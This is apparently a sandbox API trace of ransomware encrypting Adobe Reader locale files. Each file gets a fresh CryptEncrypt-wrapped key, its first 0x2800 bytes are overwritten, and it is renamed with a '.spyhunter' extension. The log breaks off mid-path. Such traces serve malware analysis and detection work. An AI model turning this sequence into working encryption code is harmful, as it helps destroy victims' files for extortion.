1 [0114.979] GetProcessHeap () returned 0x2c0000 [0114.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0114.979] GetProcessHeap () returned 0x2c0000 [0114.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e36ec0 | out: hHeap=0x2c0000) returned 1 [0114.979] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f950 | out: pbBuffer=0x57f950) returned 1 [0114.979] GetProcessHeap () returned 0x2c0000 [0114.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0114.979] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f948*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f948*=0x30) returned 1 [0114.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0114.989] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\DEXShare.asfx") returned 87 [0114.989] StrStrW (lpFirst="DEXShare.asfx", lpSrch=".txt") returned 0x0 [0114.989] GetProcessHeap () returned 0x2c0000 [0114.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0114.990] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f90c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f90c*=0x2800, lpOverlapped=0x0) returned 1 [0115.074] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.074] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f90c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f90c*=0x2800, lpOverlapped=0x0) returned 1 [0115.529] GetProcessHeap () returned 0x2c0000 [0115.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0115.529] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.529] WriteFile (in: hFile=0xec, lpBuffer=0x57f94c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f90c, lpOverlapped=0x0 | out: lpBuffer=0x57f94c*, lpNumberOfBytesWritten=0x57f90c*=0x4, lpOverlapped=0x0) returned 1 [0115.529] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f90c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f90c*=0x30, lpOverlapped=0x0) returned 1 [0115.529] CloseHandle (hObject=0xec) returned 1 [0115.529] GetProcessHeap () returned 0x2c0000 [0115.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0115.529] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\DEXShare.asfx.spyhunter") returned 97 [0115.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\dexshare.asfx"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\DEXShare.asfx.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\dexshare.asfx.spyhunter")) returned 1 [0115.530] GetProcessHeap () returned 0x2c0000 [0115.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0115.530] GetProcessHeap () returned 0x2c0000 [0115.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0115.530] GetProcessHeap () returned 0x2c0000 [0115.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e10268 | out: hHeap=0x2c0000) returned 1 [0115.530] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f950 | out: pbBuffer=0x57f950) returned 1 [0115.530] GetProcessHeap () returned 0x2c0000 [0115.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0115.530] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f948*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f948*=0x30) returned 1 [0115.530] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\updater.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\updater.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0115.692] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\updater.FRA") returned 76 [0115.692] StrStrW (lpFirst="updater.FRA", lpSrch=".txt") returned 0x0 [0115.692] GetProcessHeap () returned 0x2c0000 [0115.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0115.692] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f90c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f90c*=0x2800, lpOverlapped=0x0) returned 1 [0115.815] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.815] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f90c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f90c*=0x2800, lpOverlapped=0x0) returned 1 [0115.816] GetProcessHeap () returned 0x2c0000 [0115.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0115.816] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.816] WriteFile (in: hFile=0x120, lpBuffer=0x57f94c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f90c, lpOverlapped=0x0 | out: lpBuffer=0x57f94c*, lpNumberOfBytesWritten=0x57f90c*=0x4, lpOverlapped=0x0) returned 1 [0115.816] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f90c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f90c*=0x30, lpOverlapped=0x0) returned 1 [0115.816] CloseHandle (hObject=0x120) returned 1 [0115.816] GetProcessHeap () returned 0x2c0000 [0115.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0115.816] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\updater.FRA.spyhunter") returned 86 [0115.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\updater.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\updater.fra"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\updater.FRA.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\updater.fra.spyhunter")) returned 1 [0115.817] GetProcessHeap () returned 0x2c0000 [0115.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0115.817] GetProcessHeap () returned 0x2c0000 [0115.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0115.817] GetProcessHeap () returned 0x2c0000 [0115.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e14fe0 | out: hHeap=0x2c0000) returned 1 [0115.817] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f948 | out: pbBuffer=0x57f948) returned 1 [0115.817] GetProcessHeap () returned 0x2c0000 [0115.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0115.817] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f940*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f940*=0x30) returned 1 [0115.817] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\updater.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\updater.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0115.886] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\updater.JPN") returned 76 [0115.886] StrStrW (lpFirst="updater.JPN", lpSrch=".txt") returned 0x0 [0115.886] GetProcessHeap () returned 0x2c0000 [0115.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0115.886] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f904, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f904*=0x2200, lpOverlapped=0x0) returned 1 [0115.958] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffde00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.958] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2200, lpNumberOfBytesWritten=0x57f904, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f904*=0x2200, lpOverlapped=0x0) returned 1 [0115.959] GetProcessHeap () returned 0x2c0000 [0115.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0115.959] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.959] WriteFile (in: hFile=0x120, lpBuffer=0x57f944*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f904, lpOverlapped=0x0 | out: lpBuffer=0x57f944*, lpNumberOfBytesWritten=0x57f904*=0x4, lpOverlapped=0x0) returned 1 [0115.959] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f904, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f904*=0x30, lpOverlapped=0x0) returned 1 [0115.959] CloseHandle (hObject=0x120) returned 1 [0115.959] GetProcessHeap () returned 0x2c0000 [0115.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0115.959] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\updater.JPN.spyhunter") returned 86 [0115.959] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\updater.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\updater.jpn"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\updater.JPN.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\updater.jpn.spyhunter")) returned 1 [0115.960] GetProcessHeap () returned 0x2c0000 [0115.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0115.960] GetProcessHeap () returned 0x2c0000 [0115.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0115.960] GetProcessHeap () returned 0x2c0000 [0115.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8d208 | out: hHeap=0x2c0000) returned 1 [0115.961] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f940 | out: pbBuffer=0x57f940) returned 1 [0115.961] GetProcessHeap () returned 0x2c0000 [0115.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0115.961] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f938*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f938*=0x30) returned 1 [0115.962] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Weblink.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\weblink.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0116.300] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Weblink.NLD") returned 76 [0116.300] StrStrW (lpFirst="Weblink.NLD", lpSrch=".txt") returned 0x0 [0116.300] GetProcessHeap () returned 0x2c0000 [0116.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0116.301] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f8fc*=0x2800, lpOverlapped=0x0) returned 1 [0116.402] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0116.402] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f8fc*=0x2800, lpOverlapped=0x0) returned 1 [0116.402] GetProcessHeap () returned 0x2c0000 [0116.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0116.402] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.402] WriteFile (in: hFile=0x120, lpBuffer=0x57f93c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8fc, lpOverlapped=0x0 | out: lpBuffer=0x57f93c*, lpNumberOfBytesWritten=0x57f8fc*=0x4, lpOverlapped=0x0) returned 1 [0116.403] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8fc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8fc*=0x30, lpOverlapped=0x0) returned 1 [0116.403] CloseHandle (hObject=0x120) returned 1 [0116.403] GetProcessHeap () returned 0x2c0000 [0116.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0116.403] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Weblink.NLD.spyhunter") returned 86 [0116.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Weblink.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\weblink.nld"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Weblink.NLD.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\weblink.nld.spyhunter")) returned 1 [0116.404] GetProcessHeap () returned 0x2c0000 [0116.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0116.404] GetProcessHeap () returned 0x2c0000 [0116.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0116.404] GetProcessHeap () returned 0x2c0000 [0116.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6b1c0 | out: hHeap=0x2c0000) returned 1 [0116.420] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f938 | out: pbBuffer=0x57f938) returned 1 [0116.421] GetProcessHeap () returned 0x2c0000 [0116.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0116.421] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f930*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f930*=0x30) returned 1 [0116.421] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0116.421] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\Services.asfx") returned 87 [0116.421] StrStrW (lpFirst="Services.asfx", lpSrch=".txt") returned 0x0 [0116.421] GetProcessHeap () returned 0x2c0000 [0116.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0116.421] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f8f4*=0xe3, lpOverlapped=0x0) returned 1 [0116.422] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffff1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0116.422] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x57f8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f8f4*=0xe3, lpOverlapped=0x0) returned 1 [0116.422] GetProcessHeap () returned 0x2c0000 [0116.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0116.422] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.422] WriteFile (in: hFile=0x120, lpBuffer=0x57f934*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8f4, lpOverlapped=0x0 | out: lpBuffer=0x57f934*, lpNumberOfBytesWritten=0x57f8f4*=0x4, lpOverlapped=0x0) returned 1 [0116.423] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8f4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8f4*=0x30, lpOverlapped=0x0) returned 1 [0116.423] CloseHandle (hObject=0x120) returned 1 [0116.423] GetProcessHeap () returned 0x2c0000 [0116.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0116.423] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\Services.asfx.spyhunter") returned 97 [0116.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\services.asfx"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\Services.asfx.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\services.asfx.spyhunter")) returned 1 [0116.423] GetProcessHeap () returned 0x2c0000 [0116.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0116.423] GetProcessHeap () returned 0x2c0000 [0116.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0116.424] GetProcessHeap () returned 0x2c0000 [0116.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8f568 | out: hHeap=0x2c0000) returned 1 [0116.424] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f938 | out: pbBuffer=0x57f938) returned 1 [0116.424] GetProcessHeap () returned 0x2c0000 [0116.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0116.424] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f930*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f930*=0x30) returned 1 [0116.424] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0116.593] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\DEXShare.asfx") returned 87 [0116.593] StrStrW (lpFirst="DEXShare.asfx", lpSrch=".txt") returned 0x0 [0116.593] GetProcessHeap () returned 0x2c0000 [0116.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0116.593] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f8f4*=0x2800, lpOverlapped=0x0) returned 1 [0116.663] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0116.663] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f8f4*=0x2800, lpOverlapped=0x0) returned 1 [0116.663] GetProcessHeap () returned 0x2c0000 [0116.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0116.663] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.663] WriteFile (in: hFile=0x120, lpBuffer=0x57f934*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8f4, lpOverlapped=0x0 | out: lpBuffer=0x57f934*, lpNumberOfBytesWritten=0x57f8f4*=0x4, lpOverlapped=0x0) returned 1 [0116.857] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8f4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8f4*=0x30, lpOverlapped=0x0) returned 1 [0116.857] CloseHandle (hObject=0x120) returned 1 [0116.857] GetProcessHeap () returned 0x2c0000 [0116.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e5aea8 [0116.857] wnsprintfW (in: pszDest=0x2e5aea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\DEXShare.asfx.spyhunter") returned 97 [0116.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\dexshare.asfx"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\DEXShare.asfx.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\dexshare.asfx.spyhunter")) returned 1 [0116.860] GetProcessHeap () returned 0x2c0000 [0116.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5aea8 | out: hHeap=0x2c0000) returned 1 [0116.860] GetProcessHeap () returned 0x2c0000 [0116.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0116.860] GetProcessHeap () returned 0x2c0000 [0116.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8f470 | out: hHeap=0x2c0000) returned 1 [0116.883] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f930 | out: pbBuffer=0x57f930) returned 1 [0116.883] GetProcessHeap () returned 0x2c0000 [0116.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0116.883] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f928*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f928*=0x30) returned 1 [0116.883] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 